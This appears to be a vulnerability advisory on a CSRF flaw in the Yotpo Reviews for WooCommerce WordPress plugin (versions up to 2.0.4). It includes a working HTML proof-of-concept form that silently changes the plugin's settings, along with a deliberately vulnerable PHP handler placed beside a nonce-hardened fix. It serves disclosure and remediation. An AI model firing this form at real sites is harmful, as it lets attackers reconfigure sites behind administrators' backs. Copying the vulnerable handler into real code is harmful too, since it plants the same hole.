WordPress Plugin Vulnerabilities

Yotpo Reviews for WooCommerce <= 2.0.4 - Arbitrary Settings Update via CSRF

Description

The plugin does not verify a nonce when saving its settings, so an attacker can make a logged-in administrator change them via a CSRF attack: the admin only has to load an attacker-controlled page that submits a crafted form to the plugin's settings endpoint.

Proof of Concept

Use the following form to abuse the missing nonce check (example.com stands for the target site; the form must be submitted from a browser that is logged in as an administrator):

<html>
   <form enctype="application/x-www-form-urlencoded" method="POST" action="http://example.com/wp-admin/admin.php?page=yotpo-debug">
      <table>
         <tr>
            <td>app_key</td>
            <td><input type="text" value="123123123" name="app_key"></td>
         </tr>
         <tr>
            <td>authenticated</td>
            <td><input type="text" value=" true" name="authenticated"></td>
         </tr>
         <tr>
            <td>widget_location</td>
            <td><input type="text" value="footer" name="widget_location"></td>
         </tr>
         <tr>
            <td>language_code</td>
            <td><input type="text" value="en" name="language_code"></td>
         </tr>
         <tr>
            <td>widget_tab_name</td>
            <td><input type="text" value="Reviews" name="widget_tab_name"></td>
         </tr>
         <tr>
            <td>bottom_line_enabled_product</td>
            <td><input type="text" value=" true" name="bottom_line_enabled_product"></td>
         </tr>
         <tr>
            <td>qna_enabled_product</td>
            <td><input type="text" value=" true" name="qna_enabled_product"></td>
         </tr>
         <tr>
            <td>bottom_line_enabled_category</td>
            <td><input type="text" value=" true" name="bottom_line_enabled_category"></td>
         </tr>
         <tr>
            <td>yotpo_language_as_site</td>
            <td><input type="text" value="1" name="yotpo_language_as_site"></td>
         </tr>
         <tr>
            <td>show_submit_past_orders</td>
            <td><input type="text" value="" name="show_submit_past_orders"></td>
         </tr>
         <tr>
            <td>yotpo_order_status</td>
            <td><input type="text" value="wc-completed" name="yotpo_order_status"></td>
         </tr>
         <tr>
            <td>disable_native_review_system</td>
            <td><input type="text" value=" true" name="disable_native_review_system"></td>
         </tr>
         <tr>
            <td>debug_mode</td>
            <td><input type="text" value=" true" name="debug_mode"></td>
         </tr>
         <tr>
            <td>debug_level</td>
            <td><input type="text" value="info" name="debug_level"></td>
         </tr>
         <tr>
            <td>main_widget_hook</td>
            <td><input type="text" value="woocommerce_after_single_product" name="main_widget_hook"></td>
         </tr>
         <tr>
            <td>main_widget_priority</td>
            <td><input type="text" value="10" name="main_widget_priority"></td>
         </tr>
         <tr>
            <td>product_bottomline_hook</td>
            <td><input type="text" value="woocommerce_single_product_summary" name="product_bottomline_hook"></td>
         </tr>
         <tr>
            <td>product_bottomline_priority</td>
            <td><input type="text" value="7" name="product_bottomline_priority"></td>
         </tr>
         <tr>
            <td>product_qna_hook</td>
            <td><input type="text" value="woocommerce_single_product_summary" name="product_qna_hook"></td>
         </tr>
         <tr>
            <td>product_qna_priority</td>
            <td><input type="text" value="8" name="product_qna_priority"></td>
         </tr>
         <tr>
            <td>category_bottomline_hook</td>
            <td><input type="text" value="woocommerce_after_shop_loop_item" name="category_bottomline_hook"></td>
         </tr>
         <tr>
            <td>category_bottomline_priority</td>
            <td><input type="text" value="7" name="category_bottomline_priority"></td>
         </tr>
         <tr>
            <td>timeframe_from</td>
            <td><input type="text" value="90" name="timeframe_from"></td>
         </tr>
         <tr>
            <td>timeframe_to</td>
            <td><input type="text" value="0" name="timeframe_to"></td>
         </tr>
         <tr>
            <td>order_submission_method</td>
            <td><input type="text" value="hook" name="order_submission_method"></td>
         </tr>
         <tr>
            <td>widget_jsinject_selector</td>
            <td><input type="text" value="section#primary" name="widget_jsinject_selector"></td>
         </tr>
         <tr>
            <td>jsinject_selector_rating</td>
            <td><input type="text" value=".entry-title" name="jsinject_selector_rating"></td>
         </tr>
         <tr>
            <td>jsinject_selector_qna</td>
            <td><input type="text" value=".entry-title" name="jsinject_selector_qna"></td>
         </tr>
         <tr>
            <td>update_settings</td>
            <td><input type="text" value="yeah" name="update_settings"></td>
         </tr>
      </table>
      <input type="submit" value="http://localhost/wp-admin/admin.php?page=yotpo-debug">
   </form>
</html>
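For comparison, the following is an added illustration of the defect class and its fix, written for this page and not taken from the plugin's source: a minimal WordPress admin settings page in the shape the advisory describes (a POST handler with no nonce or capability check) next to a hardened version using the core nonce API. The hook name, option names, field names and the demo_ prefix are assumptions, not the plugin's identifiers.

```php
<?php
// Added illustration, not the plugin's code. Option and field names are hypothetical.

// --- Vulnerable shape: honours any POST that reaches the admin page ---
function demo_vuln_settings_page() {
    if ( isset( $_POST['update_settings'] ) ) {
        // No nonce and no capability check: a cross-site form auto-submitted
        // from a logged-in admin's browser lands here and is applied.
        update_option( 'demo_app_key', sanitize_text_field( wp_unslash( $_POST['app_key'] ) ) );
        update_option( 'demo_debug_mode', ! empty( $_POST['debug_mode'] ) );
    }
    echo '<form method="post">';
    echo '<input type="text" name="app_key" value="' . esc_attr( get_option( 'demo_app_key', '' ) ) . '">';
    echo '<input type="checkbox" name="debug_mode" value="1"' . checked( get_option( 'demo_debug_mode' ), true, false ) . '>';
    echo '<input type="submit" name="update_settings" value="Save">';
    echo '</form>';
}

// --- Hardened shape: nonce bound to this action plus a capability check ---
function demo_safe_settings_page() {
    if ( isset( $_POST['update_settings'] ) ) {
        // check_admin_referer() calls wp_die() unless the _wpnonce field is
        // present and valid for the action 'demo_update_settings'. The nonce
        // is derived from the logged-in user's session, so a cross-site form
        // cannot supply it.
        check_admin_referer( 'demo_update_settings', '_wpnonce' );

        // Nonces prove intent, not authorization: still check the capability.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( esc_html__( 'You are not allowed to change these settings.', 'demo' ) );
        }

        update_option( 'demo_app_key', sanitize_text_field( wp_unslash( $_POST['app_key'] ) ) );
        update_option( 'demo_debug_mode', ! empty( $_POST['debug_mode'] ) );
    }
    echo '<form method="post">';
    // Emits hidden _wpnonce and _wp_http_referer inputs for this action.
    wp_nonce_field( 'demo_update_settings', '_wpnonce' );
    echo '<input type="text" name="app_key" value="' . esc_attr( get_option( 'demo_app_key', '' ) ) . '">';
    echo '<input type="checkbox" name="debug_mode" value="1"' . checked( get_option( 'demo_debug_mode' ), true, false ) . '>';
    echo '<input type="submit" name="update_settings" value="Save">';
    echo '</form>';
}

// Register the hardened page under Settings (slug and titles are hypothetical).
add_action( 'admin_menu', function () {
    add_options_page( 'Demo Settings', 'Demo Settings', 'manage_options', 'demo-settings', 'demo_safe_settings_page' );
} );
```

When checking a fix for this class of bug, replay the PoC form against the patched endpoint: the request should be rejected with WordPress's "The link you followed has expired" page rather than silently applied, and the same request with a valid nonce should succeed only for a user holding the required capability.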

Miscellaneous

Original Researcher
Johannes Gangsö
Submitter
Johannes Gangsö
Verified
Yes

Timeline

Publicly Published
2022-08-01
Added
2022-08-01
Last Updated
2023-04-29